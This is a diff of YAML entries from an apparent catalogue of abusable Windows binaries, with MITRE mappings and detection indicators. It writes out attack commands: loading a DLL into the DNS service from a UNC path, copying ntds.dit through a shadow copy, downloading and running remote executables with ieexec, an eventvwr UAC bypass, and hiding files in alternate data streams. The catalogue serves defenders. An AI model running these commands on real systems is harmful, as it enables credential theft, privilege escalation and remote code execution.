||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Dnscmd.exe
|
- Path: C:\Windows\System32\Dnscmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Dnscmd.exe loading dll from UNC path
|
- IOC: Dnscmd.exe loading dll from UNC path
|
||||||
@ -32,4 +32,4 @@ Acknowledgement:
|
|||||||
Handle: '@dim0x69'
|
Handle: '@dim0x69'
|
||||||
- Person: Nikhil SamratAshok
|
- Person: Nikhil SamratAshok
|
||||||
Handle: '@nikhil_mitt'
|
Handle: '@nikhil_mitt'
|
||||||
---
|
---
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: Esentutl.exe
|
Name: Esentutl.exe
|
||||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||||
Description: Copies the source VBS file to the destination VBS file.
|
Description: Copies the source VBS file to the destination VBS file.
|
||||||
Usecase: Copies files from A to B
|
Usecase: Copies files from A to B
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
@ -29,7 +29,7 @@ Commands:
|
|||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -47,7 +47,7 @@ Commands:
|
|||||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||||
Description: Copies a (locked) file using Volume Shadow Copy
|
Description: Copies a (locked) file using Volume Shadow Copy
|
||||||
Usecase: Copy/extract a locked file such as the AD Database
|
Usecase: Copy/extract a locked file such as the AD Database
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: Admin
|
Privileges: Admin
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||||
@ -55,10 +55,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\esentutl.exe
|
- Path: C:\Windows\System32\esentutl.exe
|
||||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||||
|
@ -2,11 +2,11 @@
|
|||||||
Name: Eventvwr.exe
|
Name: Eventvwr.exe
|
||||||
Description: Displays Windows Event Logs in a GUI window.
|
Description: Displays Windows Event Logs in a GUI window.
|
||||||
Author: 'Jacob Gajek'
|
Author: 'Jacob Gajek'
|
||||||
Created: '2018-11-01'
|
Created: 2018-11-01
|
||||||
Commands:
|
Commands:
|
||||||
- Command: eventvwr.exe
|
- Command: eventvwr.exe
|
||||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||||
Category: UAC bypass
|
Category: UAC bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1088
|
MitreID: T1088
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\eventvwr.exe
|
- Path: C:\Windows\System32\eventvwr.exe
|
||||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Expand.exe
|
Name: Expand.exe
|
||||||
Description: Binary that expands one or more compressed files
|
Description: Binary that expands one or more compressed files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||||
Description: Copies source file to destination.
|
Description: Copies source file to destination.
|
||||||
@ -31,10 +31,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Expand.exe
|
- Path: C:\Windows\System32\Expand.exe
|
||||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||||
@ -43,4 +43,4 @@ Acknowledgement:
|
|||||||
Handle: '@infosecn1nja'
|
Handle: '@infosecn1nja'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Explorer.exe
|
Name: Explorer.exe
|
||||||
Description: Binary used for managing files and system components within Windows
|
Description: Binary used for managing files and system components within Windows
|
||||||
Author: 'Jai Minton'
|
Author: 'Jai Minton'
|
||||||
Created: '2020-06-24'
|
Created: 2020-06-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Extexport.exe
|
Name: Extexport.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Extexport.exe c:\test foo bar
|
- Command: Extexport.exe c:\test foo bar
|
||||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
Name: Extrac32.exe
|
Name: Extrac32.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -39,10 +39,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\extrac32.exe
|
- Path: C:\Windows\System32\extrac32.exe
|
||||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Findstr.exe
|
Name: Findstr.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\findstr.exe
|
- Path: C:\Windows\System32\findstr.exe
|
||||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: findstr.exe should normally not be invoked on a client system
|
- IOC: findstr.exe should normally not be invoked on a client system
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Forfiles.exe
|
Name: Forfiles.exe
|
||||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||||
@ -23,10 +23,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\forfiles.exe
|
- Path: C:\Windows\System32\forfiles.exe
|
||||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@vector_sec'
|
Handle: '@vector_sec'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ftp.exe
|
Name: Ftp.exe
|
||||||
Description: A binary designed for connecting to FTP servers
|
Description: A binary designed for connecting to FTP servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-12-10'
|
Created: 2018-12-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||||
Description: Executes the commands you put inside the text file.
|
Description: Executes the commands you put inside the text file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\ftp.exe
|
- Path: C:\Windows\System32\ftp.exe
|
||||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: cmd /c as child process of ftp.exe
|
- IOC: cmd /c as child process of ftp.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: GfxDownloadWrapper.exe
|
Name: GfxDownloadWrapper.exe
|
||||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||||
Author: Jesus Galvez
|
Author: Jesus Galvez
|
||||||
Created: Jesus Galvez
|
Created: 2019-12-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||||
@ -169,7 +169,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.sothis.tech/author/jgalvez/
|
- Link: https://www.sothis.tech/author/jgalvez/
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Gpscript.exe
|
Name: Gpscript.exe
|
||||||
Description: Used by group policy to process scripts
|
Description: Used by group policy to process scripts
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpscript /logon
|
- Command: Gpscript /logon
|
||||||
Description: Executes logon scripts configured in Group Policy.
|
Description: Executes logon scripts configured in Group Policy.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scripts added in local group policy
|
- IOC: Scripts added in local group policy
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Hh.exe
|
Name: Hh.exe
|
||||||
Description: Binary used for processing chm files in Windows
|
Description: Binary used for processing chm files in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: HH.exe http://some.url/script.ps1
|
- Command: HH.exe http://some.url/script.ps1
|
||||||
Description: Open the target PowerShell script with HTML Help.
|
Description: Open the target PowerShell script with HTML Help.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
- Path: C:\Windows\SysWOW64\hh.exe
|
- Path: C:\Windows\SysWOW64\hh.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||||
@ -32,4 +32,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Ie4uinit.exe
|
Name: Ie4uinit.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ie4uinit.exe -BaseSettings
|
- Command: ie4uinit.exe -BaseSettings
|
||||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||||
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||||
- Path: c:\windows\system32\ieuinit.inf
|
- Path: c:\windows\system32\ieuinit.inf
|
||||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
||||||
@ -26,4 +26,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Ieexec.exe
|
Name: Ieexec.exe
|
||||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -23,13 +23,13 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ilasm.exe
|
Name: Ilasm.exe
|
||||||
Description: used for compile c# code into dll or exe.
|
Description: used for compile c# code into dll or exe.
|
||||||
Author: Hai vaknin (lux)
|
Author: Hai vaknin (lux)
|
||||||
Created: 17/03/2020
|
Created: 2020-03-17
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ilasm.exe C:\public\test.txt /exe
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
Description: Binary file used by .NET to compile c# code to .exe
|
Description: Binary file used by .NET to compile c# code to .exe
|
||||||
@ -11,7 +11,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: ilasm.exe C:\public\test.txt /dll
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
Description: Binary file used by .NET to compile c# code to dll
|
Description: Binary file used by .NET to compile c# code to dll
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
@ -22,7 +22,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Resources:
|
Resources:
|
||||||
